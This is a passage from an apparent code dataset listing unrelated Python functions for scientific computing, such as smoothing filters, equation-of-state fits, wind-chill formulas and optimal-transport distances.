/ (2.*ndim)\n norm *= tau / weight\n norm += 1.\n p -= tau * g\n p /= norm\n E /= float(image.size)\n if i == 0:\n E_init = E\n E_previous = E\n else:\n if abs(E_previous - E) < eps * E_init:\n break\n else:\n E_previous = E\n i += 1\n return out", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def v_multiplier(self):\n return (4./3)*np.pi*(self.bins[:, 1]/2)**3", "def smooth_ust(u, z):\n z0 = 1e-3\n kappa = 0.4\n nu_air = 1.56e-5\n for i in range(20):\n ust = kappa * u / np.log(z / z0)\n z0 = 0.132 * nu_air / ust\n return ust", "def poisson_sd(data: DataSeries) -> DataSeries:\n return data.pow(0.5)", "def lorentz(self, X, xm, amp, w):\n return amp / (1 + ((X - xm) / (w / 2)) ** 2)", "def perron_term_fn(iteration_count, v, z):\n return -0.5 * z * (v + iteration_count - 0.5) / (\n (v + z + (iteration_count - 1.) / 2.) *\n (v + z + iteration_count / 2.))", "def noise(self):\n # Extract parameters\n pzs = self.params[0]\n ngals = np.array([pz.gals_per_steradian for pz in pzs])\n return 1.0 / ngals", "def murnaghan(p, v):\n return p[0]+p[1]*v/p[2]*((p[3]/v)**p[2]/(p[2]-1)+1)-p[1]*p[3]/(p[2]-1)", "def w(lam, gam, p):\n return np.sqrt((1 - lam*np.cos(2*np.pi*p ) )**2 + (gam*lam*np.sin(2*np.pi*p ) )**2 )", "def silverman(n: int, ess: float) -> float:\n\n return (ess * (n + 2) / 4) ** (-1 / (n + 4))", "def streamwise_smoothing(self, data, its, centre_weight=0.5):\n\n smooth_data_d = self.downhill_smoothing(data, its, centre_weight=centre_weight)\n smooth_data_u = self.uphill_smoothing(data, its, centre_weight=centre_weight)\n\n\n\n return 0.5 * (smooth_data_d + smooth_data_u)", "def smooth(f, g):\r\n chi_f = f.apply(lambda x: 0.0 if pd.isna(x) else 1.0)\r\n f_ext = pd.concat([f, chi_f], axis=1).prod(axis=1)\r\n a = convolve(f_ext, g)\r\n b = convolve(chi_f, g)\r\n return a.div(b)", "def scipy_smooth(img, sigma=5):\n return ndimage.gaussian_filter(img, sigma=sigma)", "def fla (mva, vnom):\r\n x=mva*1000000\r\n y=(vnom*1000)\r\n z=round(x/y,3)\r\n return z", "def g_sebal_func(ts, albedo_sur, ndvi):\n g = np.copy(ndvi).astype(np.float64)\n np.power(g, 4, out=g)\n g *= -0.98\n g += 1\n g *= ts\n g *= (albedo_sur * 0.0074 + 0.0038)\n return g", "def smooth(y, box_pts):\r\n box = np.ones(box_pts)/box_pts\r\n y_smooth = np.convolve(y, box, mode='same')\r\n return y_smooth", "def birch_murnaghan(p, v):\n return p[0]+9.0/16*p[3]*p[1]*( ( (p[3]/v)**(2.0/3)-1 )**3*p[2]+\n ( (p[3]/v)**(2.0/3)-1 )**2*\n ( 6-4*(p[3]/v)**(2.0/3) ) )", "def _lidstone_smooth(prob, smoothing, observations, outcomes):\n return (prob + smoothing) / (observations + (smoothing * outcomes))", "def pvalue_gaussian(self):\n \n pv = 2 * stats.norm.sf(abs(self.TS_prime_obs), loc=0, scale=1)\n return(pv)", "def smooth(img, sigma):\n if sigma < 0:\n raise ValueError('smoothing kernel size is negative')\n elif sigma == 0:\n return img.get_data()\n else:\n sigma_vox = sigma / np.sqrt(np.sum(img.get_affine()[0:3, 0:3] ** 2, 0))\n return nd.gaussian_filter(img.get_data(), sigma_vox)", "def apply_smoothstep(image):\n image_out = 3 * image**2 - 2 * image**3\n return image_out", "def smoothing(data, mask):\n smooth_data = gaussian_filter(data, [2, 2, 2, 0])\n\n Y = smooth_data[mask].T\n\n return Y", "def mw (mva, pf):\r\n x= mva*1000000\r\n y=x*pf/1000000\r\n return y", "def skydiving_iterate(v, t, dt, X, Y):\n return (v + dt*X(t))/(1 + dt*Y(t)*abs(v))", "def 
find_rsh(v, j):\r\n\r\n zp = sp.where(v[:-1] * v[1:] <= 0)[0][0] #make a list of A[x] * A[x -1] without usinf \"for\" loop in original python.\r\n m = np.polyfit(v[(zp - 5):(zp + 5)], j[(zp -5):(zp + 5)], 1)\r\n return 1/abs(m[0]) * 1000 #[Ohm cm^2]\r", "def spherew(self, x):\r\n # return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]\r\n # s = sum(abs(x))\r\n # return sum((x/s+0)**2) - 1/len(x)\r\n # return sum((x/s)**2) - 1/len(x)\r\n return -0.01*x[0] + abs(x[0])**-2 * sum(x[1:]**2)", "def calc_J():\n return np.random.normal(loc=0, scale=1) #loc means - mean, scale -std", "def do_smooth(d, WT, sample_rate):\n d_smooth = np.zeros(len(d))\n Wt = int(np.ceil(sample_rate*WT))\n for i in range(len(d)-Wt):\n d_smooth[i] = np.mean(d[i: i+Wt])\n d_smooth[0:Wt+100] = np.nan # +100 removes \"edge effects\" at start of f4\n return(d_smooth)", "def wpi(nev,mu):\n return np.sqrt(nev*eV2J**2/(mp*mu*epsilon));", "def smooth(y, box_pts):\n box = np.ones(box_pts) / box_pts\n y_smooth = np.convolve(y, box, mode='same')\n return y_smooth", "def smooth(y, box_pts):\n box = np.ones(box_pts) / box_pts\n y_smooth = np.convolve(y, box, mode='same')\n return y_smooth", "def excess_noise_PDF(y,base_noise,Poisson=False):\n \n y, base_noise = array(y), array(base_noise)\n ymn = mean(y)\n yvar = var(y)\n base_var = base_noise**2\n x_guess = sqrt(yvar - mean(base_var)) if yvar > mean(base_var) else 0.0\n \n def log_like(mn,x_noise,log_norm_fac):\n x_var = x_noise**2\n var = x_var + base_var\n terms = -log(2*pi*var)/2 - (y - mn)**2/2/var\n return sum(terms) + log_norm_fac\n \n #initial pass at a normalization factor - use peak value\n def neg_like(x):\n mn,x_noise= x\n return -log_like(mn,x_noise,0.0)\n result = minimize(neg_like, [ymn,x_guess], method='Nelder-Mead')\n log_norm_fac = result.fun\n mn_pk, x_noise_pk = result.x\n \n def like(mn,x_noise):\n return exp(log_like(mn, x_noise, log_norm_fac))\n \n def xmn_like(xnorm):\n constrained_like = lambda mn: like(mn, xnorm*mn)\n result = quad(constrained_like, mn_pk, inf)[0]\n result += -quad(constrained_like, mn_pk, 0.0)[0]\n return result\n \n xmn_pk = x_noise_pk/mn_pk\n result = minimize(lambda x: -xmn_like(x), xmn_pk, method='Nelder-Mead')\n xmn_pk = result.x[0]\n# f_pk = -result.fun\n if xmn_pk < 0.0: xmn_pk = 0.0\n# width = 1.0/f_pk\n# area = pu.gauss_integrate(xmn_like, xmn_pk, 0.0, inf, sigma_guess=width)\n area = quad(xmn_like, xmn_pk, inf)[0]\n area += -quad(xmn_like, xmn_pk, 0.0)[0]\n pdf = lambda x: xmn_like(x)/area if x >= 0.0 else 0.0\n# if pdf(xmn_pk) <= 0.0: pdb.set_trace()\n return pdf, xmn_pk", "def f4():\n n = 4\n v = np.arange(n)**0.75 * 0.2\n e = (np.arange(n)+1)**0.7 * 1e-1\n\n n = 12\n v = np.arange(n)\n e = np.array([0.1]*n) * 10e-0\n\n print(Sumb(v,e))\n\n f = plt.figure()\n a = f.add_subplot(111)\n\n dx = 0.0001\n x = np.arange(-1,v[-1]+1,dx)\n y = x.copy()\n y[:] = 0.\n for i in range(n):\n yx = lg(x,v[i],e[i])\n a.plot(x,np.exp(yx),label='{:d}'.format(i))\n y += yx\n y = np.exp((y - np.max(y))/n**2)\n y /= np.sum(y) * dx \n a.plot(x,y,label='sum')\n s = np.argsort(y)[::-1]\n ys = np.cumsum(y[s]) * dx\n yi = np.argwhere(ys > 0.682689492137)[0][0]\n print('mean = {:2f}'.format(x[s[0]]))\n print('sigma = {:2f}'.format(yi*dx/2))\n xy = np.ndarray((yi+2,2))\n i0,i1 = min(s[:yi]), max(s[:yi])\n xy[:yi,0] = x[i0:i1+1]\n xy[:yi,1] = y[i0:i1+1]\n xy[yi:,1] = 0\n xy[yi:,0] = x[[i1,i0]]\n a.add_patch(Polygon(xy,fill=True,color='green',ec='none',alpha=0.25))\n \n leg = plt.legend()\n plt.draw()", "def temporal_smooth(s, sample_rate, 
tau, hwinlen=20):\n\n t = np.arange(-hwinlen, hwinlen+1) / sample_rate\n w = np.exp(-t**2 / tau)\n w /= w.sum()\n return convolve1d(s, w)", "def scaling_factor_epanechnikov( h ):\n h = np.array( h, copy=False).ravel()\n n = len(h)\n s = ( np.pi**(n/2.0) ) / sp.special.gamma( n/2.0 + 1 )\n s = (n/2.0 + 1)/s\n s /= np.product(h)\n return s", "def snRate(self, z):\n res = self.alpha * (1.0 + z)**self.beta \n res *= ((self.cosmo.h / 0.7) **3.) \n return res", "def get_evaporation_latent_heat() -> float:\n theta = 28.0\n return 2500.8 - 2.3668 * theta", "def vol(x):\r\n return pi*(topdia(x)/2000.)**2 * length (x)", "def wind_chill(T_a, v):\r\n return 13.12 + 0.6215*(T_a) - 11.37*(v)**0.16 + 0.3965*(T_a)*(v)**0.16", "def zvalue(value, sigma, mu):\n return (value - mu) / sigma", "def stationary_distribution(self):\n P = self.markov_transition()\n N = len(P)\n I = np.identity(N)\n A = P.T - I # get right-kernel\n pi = null_space(A)\n pi = pi / sum(pi)\n pi = [float(item) for item in pi]\n return pi", "def fgausbg(v,p):\n return np.exp(-0.5 * ((v[0] - p[0]) / p[1])**2) * p[2] + p[3]", "def gradientFn(P, mu, v):\n with torch.no_grad():\n b, m, n = P.size()\n B = P / mu\n hinv = B.flatten(start_dim=-2)\n d1inv = B.sum(-1)[:, 1:].reciprocal() # Remove first element\n d2 = B.sum(-2)\n B = B[:, 1:, :] # Remove top row\n S = -B.transpose(-2, -1).matmul(d1inv.unsqueeze(-1) * B)\n S[:, range(n), range(n)] += d2\n Su = torch.cholesky(S)\n Sinv = torch.zeros_like(S)\n for i in range (b):\n Sinv[i, ...] = torch.cholesky_inverse(Su[i, ...]) # Currently cannot handle batches\n R = -B.matmul(Sinv) * d1inv.unsqueeze(-1)\n Q = -R.matmul(B.transpose(-2, -1) * d1inv.unsqueeze(-2))\n Q[:, range(m - 1), range(m - 1)] += d1inv\n # Build vector-Jacobian product from left to right:\n vHinv = v * hinv # bxmn * bxmn -> bxmn\n # Break vHinv into m blocks of n elements:\n u1 = vHinv.reshape((-1, m, n)).sum(-1)[:, 1:].unsqueeze(-2) # remove first element\n u2 = vHinv.reshape((-1, m, n)).sum(-2).unsqueeze(-2)\n u3 = u1.matmul(Q) + u2.matmul(R.transpose(-2, -1))\n u4 = u1.matmul(R) + u2.matmul(Sinv)\n u5 = u3.expand(-1, n, -1).transpose(-2, -1)+u4.expand(-1, m-1, -1)\n uHinv = torch.cat((u4, u5), dim=-2).flatten(start_dim=-2) * hinv\n gradient = uHinv - vHinv\n return gradient", "def slerp_gaussian(val, low, high):\n offset = norm.cdf(np.zeros_like(low)) # offset is just [0.5, 0.5, ...]\n low_gau_shifted = norm.cdf(low) - offset\n high_gau_shifted = norm.cdf(high) - offset\n circle_lerped_gau = slerp(val, low_gau_shifted, high_gau_shifted)\n epsilon = 0.001\n clipped_sum = np.clip(circle_lerped_gau + offset, epsilon, 1.0 - epsilon)\n result = norm.ppf(clipped_sum)\n return result", "def _smooth(self):\n self.te = self._spline(self.rho_in, self.te_in, self.rho)\n self.ne = self._spline(self.rho_in, self.ne_in, self.rho)\n self.ti = self._spline(self.rho_in, self.ti_in, self.rho)\n self.vt = self._spline(self.rho_in, self.vt_in, self.rho)\n for i in range(self.nion):\n self.ni[i,:]=self._spline(self.rho_in, self.ni_in[i,:], self.rho)\n self._extrapolate()", "def compute_windchill(t,v):\n a = 35.74\n b = 0.6215\n c = 35.75\n d = 0.4275\n v16 = v**0.16\n wci = a+(b*t)-(c*v16)+(d*t*v16)\n return wci", "def vonMises(self):\n s = self.voigt\n return ((1 / 2) * ((s[0] - s[1])**2\n + (s[1] - s[2])**2\n + (s[2] - s[0])**2\n + 6 * (s[3]**2 + s[4]**2 + s[5]**2))) ** (1 / 2)", "def gaussion_smoothing(self,sigma=None):\n print(\"## Gaussian smoothing...\");\n corr_length = self.corr_length\n if sigma is None:\n corr = self.correlation\n 
oscillation=np.max(np.abs(corr[:-1]-corr[1:]),axis=0)\n peak=np.max(np.abs(corr),axis=0)\n oscillation /= peak\n sigma= corr_length/(5.0*oscillation*len(corr)*self.smooth_tune) # 15.0 has been tuned for many times \n print \"sigma:\"\n print sigma\n for i in np.arange(corr_length):\n self.correlation[i] *= exp(-i*i/(2*sigma*sigma))/(sigma*sqrt(2*pi))", "def s_multiplier(self):\n return 4 * np.pi * (self.bins[:, 1]/2)**2", "def bandwidth(d):\n gz = 2 * gamma(0.5 * (d+1)) / gamma(0.5 * d)\n return 1. / (2. * gz**2)", "def smooth(D, W, smoothing):\n WD = scipy.ndimage.gaussian_filter(W * D, smoothing)\n W = scipy.ndimage.gaussian_filter(W, smoothing)\n D = np.divide(WD, W, out=np.zeros_like(D), where=W > 0)\n return D, W", "def g2dfwhm(img):\n npix = img.shape[0]\n rowCen,colCen = adaptiveCentroid(img,1.1/scale)\n row,col = np.mgrid[0:npix,0:npix]\n row = row - rowCen\n col = col - colCen\n A0,sigmac0 = moments(img)\n sigmar0 = sigmac0\n rho0 = 0.\n B0 = 0.\n p0=np.array([sigmac0,sigmar0,rho0,A0, B0])\n def residualg2d(p,x,y,xc,yc,I):\n sigmax,sigmay,rho,A,B = p\n Ierr = np.sqrt(abs(I))+0.00001 # to avoid those = 0, add a small number \n res = (gaussian2d(x,y,xc,yc,sigmax,sigmay,rho,A,B) - I)/Ierr\n return res.flatten()\n p = leastsq(residualg2d,p0,args=(col,row,colCen,rowCen,img))[0]\n sigmac,sigmar,rho,A,B = p\n Mcc = sigmac**2\n Mrr = sigmar**2\n Mrc = rho**2*Mcc*Mrr\n M20 = Mrr + Mcc\n M22 = complex(Mcc - Mrr,2*Mrc)\n whiskerLength = np.sqrt(np.abs(M22))\n lambdap = 0.5*(M20 + abs(M22))\n lambdam = 0.5*(M20 - abs(M22))\n fwhm_g2d = np.sqrt(2.*np.log(2.))*(np.sqrt(lambdap)+np.sqrt(lambdam))\n #fwhm = np.sqrt(M20/2.)*2.35482*scale\n return A, B, whiskerLength, fwhm_g2d", "def estimate_nb(x,y,smoothing):\n\n raise NotImplementedError", "def smooth_spectrum(wlm, s, wave_min=0, wave_max=0, step=50, exclude_wlm=[[0,0]], order=7, \n weight_fit_median=0.5, plot=False, verbose=False, fig_size=12):\n\n if verbose: print(\"\\n> Computing smooth spectrum...\")\n\n if wave_min == 0 : wave_min = wlm[0]\n if wave_max == 0 : wave_max = wlm[-1]\n \n running_wave = [] \n running_step_median = []\n cuts=np.int( (wave_max - wave_min) /step)\n \n exclude = 0 \n corte_index=-1\n for corte in range(cuts+1):\n next_wave= wave_min+step*corte\n if next_wave < wave_max:\n if next_wave > exclude_wlm[exclude][0] and next_wave < exclude_wlm[exclude][1]:\n if verbose: print(\" Skipping \",next_wave, \" as it is in the exclusion range [\",exclude_wlm[exclude][0],\",\",exclude_wlm[exclude][1],\"]\") \n\n else:\n corte_index=corte_index+1\n running_wave.append (next_wave)\n region = np.where((wlm > running_wave[corte_index]-step/2) & (wlm < running_wave[corte_index]+step/2)) \n running_step_median.append (np.nanmedian(s[region]) )\n if next_wave > exclude_wlm[exclude][1]:\n exclude = exclude + 1\n #if verbose and exclude_wlm[0] != [0,0] : print \"--- End exclusion range \",exclude \n if exclude == len(exclude_wlm) : exclude = len(exclude_wlm)-1 \n \n running_wave.append (wave_max)\n region = np.where((wlm > wave_max-step) & (wlm < wave_max+0.1))\n running_step_median.append (np.nanmedian(s[region]) )\n \n # Check not nan\n _running_wave_=[]\n _running_step_median_=[]\n for i in range(len(running_wave)):\n if np.isnan(running_step_median[i]):\n if verbose: print(\" There is a nan in \",running_wave[i])\n else:\n _running_wave_.append (running_wave[i])\n _running_step_median_.append (running_step_median[i])\n \n fit = np.polyfit(_running_wave_, _running_step_median_, order)\n pfit = np.poly1d(fit)\n fit_median = pfit(wlm)\n 
\n interpolated_continuum_smooth = interpolate.splrep(_running_wave_, _running_step_median_, s=0.02)\n fit_median_interpolated = interpolate.splev(wlm, interpolated_continuum_smooth, der=0)\n \n if plot: \n plt.figure(figsize=(fig_size, fig_size/2.5)) \n plt.plot(wlm,s, alpha=0.5)\n plt.plot(running_wave,running_step_median, \"+\", ms=15, mew=3)\n plt.plot(wlm, fit_median, label=\"fit median\")\n plt.plot(wlm, fit_median_interpolated, label=\"fit median_interp\")\n plt.plot(wlm, weight_fit_median*fit_median + (1-weight_fit_median)*fit_median_interpolated, label=\"weighted\")\n #extra_display = (np.nanmax(fit_median)-np.nanmin(fit_median)) / 10\n #plt.ylim(np.nanmin(fit_median)-extra_display, np.nanmax(fit_median)+extra_display)\n ymin = np.nanpercentile(s,1)\n ymax= np.nanpercentile(s,99)\n rango = (ymax-ymin)\n ymin = ymin - rango/10.\n ymax = ymax + rango/10. \n plt.ylim(ymin,ymax)\n plt.xlim(wlm[0]-10, wlm[-1]+10)\n plt.minorticks_on()\n plt.legend(frameon=False, loc=1, ncol=1)\n\n plt.axvline(x=wave_min, color='k', linestyle='--')\n plt.axvline(x=wave_max, color='k', linestyle='--')\n\n plt.xlabel(\"Wavelength [$\\mathrm{\\AA}$]\")\n \n if exclude_wlm[0][0] != 0:\n for i in range(len(exclude_wlm)):\n plt.axvspan(exclude_wlm[i][0], exclude_wlm[i][1], color='r', alpha=0.1) \n plt.show()\n plt.close()\n print(' Weights for getting smooth spectrum: fit_median =',weight_fit_median,' fit_median_interpolated =',(1-weight_fit_median))\n\n return weight_fit_median*fit_median + (1-weight_fit_median)*fit_median_interpolated # (fit_median+fit_median_interpolated)/2 # Decide if fit_median or fit_median_interpolated", "def wasserstein(X,t,p,lam=10,its=10,sq=False,backpropT=False):\n\n it = torch.where(t > 0)[0] # getting the positions\n ic = torch.where(t < 1)[0]\n\n Xt = torch.index_select(X, 0, it) # Getting the nx100 for each value\n Xc = torch.index_select(X, 0, ic)\n\n nc = Xc.shape[0]\n nt = Xt.shape[0]\n\n ''' Compute distance matrix'''\n if sq:\n M = pdist2sq(Xt,Xc)\n else:\n M = safe_sqrt(pdist2sq(Xt,Xc))\n\n ''' Estimate lambda and delta '''\n M_mean = torch.mean(M)\n M_drop = torch.nn.Dropout(10/(nc*nt))(M)\n delta = torch.max(M)\n eff_lam = lam/M_mean\n\n ''' Compute new distance matrix '''\n Mt = M\n row = delta*torch.ones(M.shape[1])\n col = torch.cat((delta*torch.ones(M.shape[0]),torch.zeros((1))),0)\n Mt = torch.cat((M, torch.unsqueeze(row, 0)), 0)\n Mt = torch.cat((Mt, torch.unsqueeze(col, 1)), 1)\n\n ''' Compute marginal vectors '''\n temp = torch.where(t > 0)[0].shape\n a = torch.cat((p * torch.ones((torch.where(t > 0)[0].shape[0],1)) / nt, (1 - p) * torch.ones((1,1))), 0)\n b = torch.cat(((1-p) * torch.ones((torch.where(t < 1)[0].shape[0],1)) / nc, p * torch.ones((1,1))), 0)\n\n ''' Compute kernel matrix'''\n Mlam = eff_lam*Mt\n K = torch.exp(-Mlam) + 1e-6 # added constant to avoid nan\n U = K*Mt\n ainvK = K/a\n\n u = a\n for i in range(0,its):\n temp = torch.transpose(torch.matmul(torch.transpose(u,0,1),K),0,1)\n u = 1.0/(torch.matmul(ainvK,( b / temp)))\n temp = torch.transpose(torch.matmul(torch.transpose(u,0,1),K),0,1)\n v = b/(temp)\n\n T = u*(torch.transpose(v,0,1)*K)\n\n E = T*Mt\n D = 2*torch.sum(E)\n\n return D, Mlam", "def smooth(self):\n minimal = np.median(self.pheromone_matrix[self.pheromone_matrix > -inf])\n maxim = np.max(self.pheromone_matrix)\n self.pheromone_matrix[self.pheromone_matrix == maxim] = minimal * np.log(maxim/minimal)", "def myTwistFunctionAirliner(Epsilon):\n return -(6.53*Epsilon*Epsilon - 14.1*Epsilon + 4.24)", "def overturning_streamfunction(v, 
dz, dx):\n if len(v.shape)!=3:\n raise Exception(\"v dim !=3\")\n\n #integrate over longitude\n vint=(v.transpose((0,2,1))*dx).transpose((0,2,1))\n vint=vint.sum(axis=0)\n\n #depth integration\n vint=(vint*dz).cumsum(axis=-1)\n\n psim=numpy.zeros( (v.shape[1], v.shape[2]+1))*vint[0,0]\n psim[:,1:]=-vint\n\n return psim", "def wr(x,y,xcen,ycen,sigma):\n res=np.exp(-((x-xcen)**2+(y-ycen)**2)/(2.*sigma**2))/(2.*np.pi*sigma**2) \n return res", "def gauss_term_fn(iteration_count, v, z):\n return tf.math.square(z) / 4. / (\n (v + iteration_count - 1) * (v + iteration_count))", "def SE(H, W):\n\n no_real, N, N, K, M = H.shape\n all_powers = np.swapaxes(np.swapaxes(H, 0, 1) @ hermitian(W), 0, 1)\n all_powers = np.abs(all_powers) ** 2\n\n\n\n # (no_real, N, N, K, K)\n # (no_real, n_t, n, k, k_neighbor)\n # the power coming from BS n_t to User k in BS n, using the\n # precoding of BS n_t to user k_neighbor in BS n1\n\n\n p_sig = np.zeros((no_real, N, K))\n p_int = np.zeros((no_real, N, K, N))\n sinr = np.zeros_like(p_sig)\n\n\n for r in range(no_real):\n for n in range(N):\n for k in range(K):\n p_sig[r, n, k] = all_powers[r, n, n, k, k]\n for n_t in range(N):\n p_int[r, n, k, n_t] = all_powers[r, n_t, n, k].sum()\n if n_t == n:\n p_int[r, n, k, n_t] -= p_sig[r,n,k]\n sinr = p_sig / ((p_int).sum(axis=-1) + 1)\n return np.log2(1 + sinr), p_sig, p_int", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def lerp_gaussian(val, low, high):\n low_gau = norm.cdf(low)\n high_gau = norm.cdf(high)\n lerped_gau = lerp(val, low_gau, high_gau)\n return norm.ppf(lerped_gau)", "def sinkhorn_log(mu,nu,c,epsilon, \n options={'niter':1000, 'tau':-0.5, 'rho':np.inf}):\n\n for key,val in zip(['tau','rho','niter'],[-.5,np.inf,500]):\n options.setdefault(key, val)\n rho,tau,niter = options['rho'],options['tau'],options['niter']\n\n lam = rho/(rho+epsilon)\n if rho==np.inf:\n lam=1.0\n\n H1 = np.ones_like(mu)\n H2 = np.ones_like(nu)\n\n ave = lambda tau, u, u1: tau*u+(1-tau)*u1\n\n lse = lambda A: np.log(np.sum(np.exp(A),axis=1))\n M = lambda u,v:(-c+u[:,np.newaxis]@H2[np.newaxis,:] + H1[:,np.newaxis]@v[np.newaxis,:] )/epsilon\n\n # kullback divergence\n H = lambda p: -np.sum( p.flatten()*(np.log(p.flatten()+1e-20)-1) )\n KL = lambda h,p: np.sum( h.flatten()* np.log( h.flatten()/p.flatten() ) - h.flatten()+p.flatten())\n KLd = lambda u,p: np.sum( p.flatten()*( np.exp(-u.flatten()) -1) )\n dotp = lambda x,y: np.sum(x*y); \n\n err,Wprimal,Wdual = [],[],[]\n u = np.zeros_like(mu)\n v = np.zeros_like(nu)\n\n for _ in range(niter):\n u1=u\n u = ave(tau, u, lam*epsilon*np.log(mu) - lam*epsilon*lse( M(u,v) ) + lam*u )\n v = ave(tau, v, lam*epsilon*np.log(nu) - lam*epsilon*lse( M(u,v).T) + lam*v )\n gamma = np.exp(M(u,v))\n\n if rho==np.inf: \n Wprimal.append(dotp(c,gamma) - epsilon*H(gamma))\n Wdual.append( dotp(u,mu) + dotp(v,nu) - epsilon*np.sum(gamma) )\n err.append( np.linalg.norm( np.sum(gamma,axis=1)-mu ) )\n else:\n Wprimal.append( dotp(c,gamma) - epsilon*H(gamma) \\\n + rho*KL(np.sum(gamma,axis=1),mu) \\\n + rho*KL(np.sum(gamma,axis=0),nu) )\n\n Wdual.append( -rho*KLd(u/rho,mu) - rho*KLd(v/rho,nu) \\\n - epsilon*np.sum( gamma))\n err.append(np.linalg.norm(u-u1, ord=1) )\n \n WDistance = Wprimal[-1]+epsilon*H(gamma)\n\n return gamma,Wprimal,Wdual,err,WDistance", "def test_power(self):\r\n a = 6 # shape\r\n samples = 5000\r\n max = -0.06\r\n min = -3.3\r\n s = np.random.power(a, 
samples) * -1 * (min - max) + min\r\n plt.hist(s, bins=30, density=False)\r\n plt.xlabel('Interlayer point energy [eV]')\r\n plt.ylabel('Frequency')\r\n plt.show()", "def _kernel(self, point, observation, bandwidth):\n denom = bandwidth * ((2*math.pi)**.5) \n num = math.exp(-0.5 * ((point-observation)/bandwidth)**2)\n return num/denom", "def compute_stoch_gradient(y, tx, w):\n N = y.shape[0]\n e = y - np.dot(tx, w)\n \n return -1/N*np.dot(tx.T, e)", "def mt(P_1,V0_1,meanF_1,rho): \n psi = np.arctan2(V0_1[2],-V0_1[0])\n \n # Find swept ares\n idx_zmax = np.argmax(P_1[:,-1,2])\n idx_ymax = np.argmax(P_1[:,-1,1])\n idx_zmin = np.argmin(P_1[:,-1,2])\n \n Ad = np.linalg.norm(P_1[idx_zmax,-1,2]-P_1[idx_zmin,-1,2])*P_1[idx_ymax,-1,1]\n print P_1[idx_zmax,-1,2]\n V0 = np.linalg.norm(V0_1)\n \n Vi_1new = np.zeros_like(V0_1,dtype=float)\n\n while True:\n Vi_1 = Vi_1new\n \n Vi_1new[0] = meanF_1[0] / (2 * rho * Ad * np.sqrt( (V0*np.cos(psi)+Vi_1[0])**2 + (-V0*np.sin(psi)+Vi_1[2])**2 )) \n Vi_1new[2] = meanF_1[2] / (2 * rho * Ad * np.sqrt( (V0*np.cos(psi)+Vi_1[0])**2 + (-V0*np.sin(psi)+Vi_1[2])**2 )) \n \n if np.linalg.norm(Vi_1-Vi_1new) < 0.001:\n break\n\n return -Vi_1", "def powerLaw(minskew,minkurt,transform,x):\n exponent = 0.05\n while exponent < 20:\n y = x**exponent\n (newskew,newkurt) = computeMoments(y)\n (minskew,minkurt,transform) = checkMin(minskew,minkurt,newskew,newkurt,transform,exponent)\n exponent *= 1.5\n #endwhile\n return (minskew,minkurt,transform)", "def y01(x):\r\n # return pini*((special.gamma(k1+p1))/(special.gamma(k1)*special.gamma(p1))*((x/l)**(k1-1))*(1-(x/l))**(p1-1))/7.3572\r\n return 1/100*x*epsilon*1/q*1e21\r\n # return 1e13*1/sigma*np.sqrt(2*np.pi) * np.exp(-np.power(x - u, 2.) / (2 * np.power(sigma, 2.)))-1e15*1/sigma\r", "def fun_decay_inv(p,r):\n return (p[1]*r0 / r) * np.cos(p[0]*r + p[2])", "def modality(v):\n \n s = st.skew(vel, bias=False)\n k = st.kurtosis(vel, bias=False)\n m = (1+s**2)/(3+k**2)\n return s, k, m", "def beta_gen_slope(p):\n cardi = 0.005\n return np.array( [0]*int(p-int(cardi*p)) + list(np.arange(1, int(cardi*p)+1, 1)) )", "def ps(self, sigma, z):\n \n delta_c = self.params[0]\n \n return sqrt(2.e0/pi) * (delta_c/sigma) * exp( (-delta_c*delta_c)/(2.e0*sigma*sigma) )", "def wpe(nev):\n return np.sqrt(nev*eV2J**2/(me*epsilon));", "def dry_snow_density(self):\n return (self.rho - self.h2o_vol * RHO_W0) / \\\n (1 - self.h2o_vol * RHO_W0 / RHO_ICE)", "def func_gaussian(self, dmv, vpar):\n dmoff = dmv - vpar[0]\n sig = vpar[1]\n sig = sig * sig\n return np.exp(-0.5 * dmoff * dmoff / sig) * self.ThetaFunc(dmv)", "def test_temporal_smoothing_how(perfectModelEnsemble_initialized_control_1d_ym_cftime):\r\n pm = perfectModelEnsemble_initialized_control_1d_ym_cftime\r\n pm_smoothed_mean = pm.smooth({\"lead\": 4}, how=\"mean\")\r\n pm_smoothed_sum = pm.smooth({\"lead\": 4}, how=\"sum\")\r\n assert (\r\n pm_smoothed_sum.get_initialized().mean()\r\n > pm_smoothed_mean.get_initialized().mean() * 2\r\n )", "def likelihood(ts,w,Phi):\n a = Phi.dot(w)\n return np.exp(a*ts)*sigmoid(-a)", "def waveparameterh(L):\r\n return 8.13 - ((250 - 0.7 * L) / 125) ** 3", "def swe(lon, lat, month):\n\n im = month - 1\n\n h0 = np.array( [ 8.37, 9.43, 10.74, 11.67, 11.80, 12.48,\n 4.01, 1.08, 3.84, 6.24, 7.54, 8.00 ] )\n a = np.array( [ -0.0270, 0.0058, 0.1618, 0.0841, -0.0043, 0.2084,\n 0.0970, 0.0712, 0.0393, 0.1158, 0.0567, -0.0540 ] )\n b = np.array( [ -0.3400, -0.1309, 0.0276, -0.1328, -0.4284, -0.5739,\n -0.4930, -0.1450, -0.2107, -0.2803, -0.3201, -0.3650 ] )\n c = 
np.array( [ -0.0319, 0.0017, 0.0213, 0.0081, -0.0380, -0.0468,\n -0.0333, -0.0155, -0.0182, -0.0215, -0.0284, -0.0362 ] )\n d = np.array( [ -0.0056, -0.0021, 0.0076, -0.0003, -0.0071, -0.0023,\n -0.0026, 0.0014, -0.0053, 0.0015, -0.0032, -0.0112 ] )\n e = np.array( [ -0.0005, -0.0072, -0.0125, -0.0301, -0.0063, -0.0253,\n -0.0343, -0.0000, -0.0190, -0.0176, -0.0129, -0.0035 ] )\n\n x = (90. - lat) * np.cos( np.radians(lon) )\n y = (90. - lat) * np.sin( np.radians(lon) )\n\n h = ( h0[im] + ( a[im] * x ) + ( b[im] * y ) + ( c[im] * x * y ) +\n ( d[im] * x * x ) + ( e[im] * y * y ) )\n\n# h = np.where( h < 0., 0., h)\n \n return h", "def compute_gaussnewtonvec(self, p):\r\n self.net.set_direction(p)\r\n Rp_outputs = self.net.compute_Rp_outputs()\r\n return self.net.compute_loss_grad(Rp_outputs)", "def deltaW(N, 